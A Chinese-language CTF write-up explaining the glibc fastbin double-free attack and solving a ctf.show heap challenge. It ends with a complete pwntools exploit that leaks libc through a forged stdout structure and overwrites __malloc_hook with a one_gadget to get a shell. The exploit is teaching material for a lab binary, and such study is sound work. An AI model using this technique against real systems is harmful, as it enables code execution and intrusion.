常回家看看之fastbin

常回家看看之fastbin_attack

原理分析

fastbin属于小堆块的管理，这里说的fastbin_attack大多指glibc2.26之前的手法，因为自glibc2.26以后，glibc迎来了一位新成员tcachebin，它减少了堆的开销，使堆管理变得迅速而高效，而且申请的小堆块会优先进入tachebin中，只有tachebin其中一个链表满了再次申请一个相同大小的堆块，若是小堆块再次free会进入fastbin中。

下面主要看一下fastbin，在glibc2.26以前对fastbin double free的检查没有那么严格，也就是说，如果程序里面有UAF漏洞，我们只要free第一个堆块之后free一个别的堆块，再次free第一个堆块，导致double free，实现堆块的伪造和堆块重叠。

也就是如下这种情况

在pwngdb里面是这样的

那么下次申请堆块的时候会把chunk0申请走，如果此时修改了chunk0的fd指针那么就导致把fake_chunk加入到fastbin链表中

就是如下这种情况

那么就可以实现堆块重叠

例题演示

题目保护情况

64位ida逆向

菜单

add函数，存在堆块数量上限，申请堆块之前申请了一个0x28大小的控制堆块，在控制堆块+8位置写上数据堆块地址，然后最后可以向控制堆块+16处的地址可以输入23字节的数据

free函数，存在UAF漏洞，及可以double free

show函数，没有实际的功能

分析

程序没有show功能，我们申请堆块的时候先申请到的控制堆块，然后才是自己输入的size的堆块，但是大小有限制导致不难申请到unsortbin范围大小的chunk，但是我们可以向控制堆块输入内容，导致可以伪造chunk的size位，泄露libc地址只能位置堆块实现堆块重叠，程序存在UAF漏洞，可以double free 从而可以伪造堆块，修改size为unsortbin 大小的范围然后free掉堆块

此时堆块情况

但是此时堆块size位为0x91，申请堆块的时候fastbin有检查，因此我们要复原堆块的size，但是由于没有show功能，所以可以申请堆块到IO结构体上，修改_IO_write_base 导致泄露libc地址，远程的话需要爆破高字节。

堆块7为了防止申请堆块的时候控制堆块切割unsortbin chunk。

然后用同样的手法在__malloc_hook 和 _realloc_hook布置上one_gadget，即可拿到shell

EXP

from pwn import *

context(log_level='debug',arch='amd64',os='linux')



io = process('../pwn162')

#io = remote('pwn.challenge.ctf.show', 28304)

libc = ELF('/home/su/PWN/VIPshow/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')



def Add(size,name,msg=8 * b'\x00' + p64(0x71) + b'\x00' * 7):

    io.sendlineafter("Your choice : ", '1')

    io.sendlineafter("size of the daniu's name: \n", str(size))

    io.sendafter("daniu's name:\n", name)

    io.sendlineafter("daniu's message:\n", msg)









def Delete(idx):

    io.sendlineafter("Your choice : ", '3')

    io.sendlineafter("daniu's index:\n", str(idx))

    io.recvline()





Add(0x60, 14 * p64(0x71))  # 0

Add(0x60, 14 * p64(0x71))  # 1

#gdb.attach(io)

Delete(0)

Delete(1)

Delete(0)

gdb.attach(io)

Add(0x60, '\x20')  # 2

Add(0x60, '\x20')  # 3

Add(0x60, '\x20')  # 4

Add(0x60, p64(0) + p64(0x71))  # 5

#gdb.attach(io)

Delete(0)

Delete(5)

Add(0x60, p64(0) + p64(0x91))  # 6

Add(0x20, 'bbbb')  # 7

Delete(0)

Delete(5)

Delete(7)

Add(0x60, p64(0) + p64(0x71) + b'\xdd\x45')  # 8

#gdb.attach(io)

Delete(7)

Add(0x60, 'deadbeef')  # 9

Delete(7)

#gdb.attach(io)

io.sendlineafter("Your choice : ", '1')

io.sendlineafter("size of the daniu's name: \n", str(0x60))

io.sendafter("daniu's name:\n", 0x33 * b'\x00' + p64(0x0FBAD1887) + p64(0) * 3 + b'\x58')

libc_base = u64(io.recv(6).ljust(8,b'\x00')) - 0x3c46a3

success('libc_base---->'+hex(libc_base))

pause()

malloc_hook = libc_base +libc.sym['__malloc_hook']

one = libc_base + 0xf1147

realloc  = libc_base   + libc.sym['__realloc_hook']







#gdb.attach(io)

io.sendline('a')

Delete(5)

Delete(0)

Delete(5)



Delete(7)

Add(0x60,p64(malloc_hook -0x23))

Delete(7)

Add(0x60,p64(malloc_hook -0x23))

Delete(7)

Add(0x60,p64(malloc_hook -0x23))



Delete(7)

payload = b'a'*0xb + p64(one) + p64(realloc)

#gdb.attach(io)

Add(0x60,payload)

#gdb.attach(io)

io.sendlineafter("Your choice : ", '1')











io.interactive()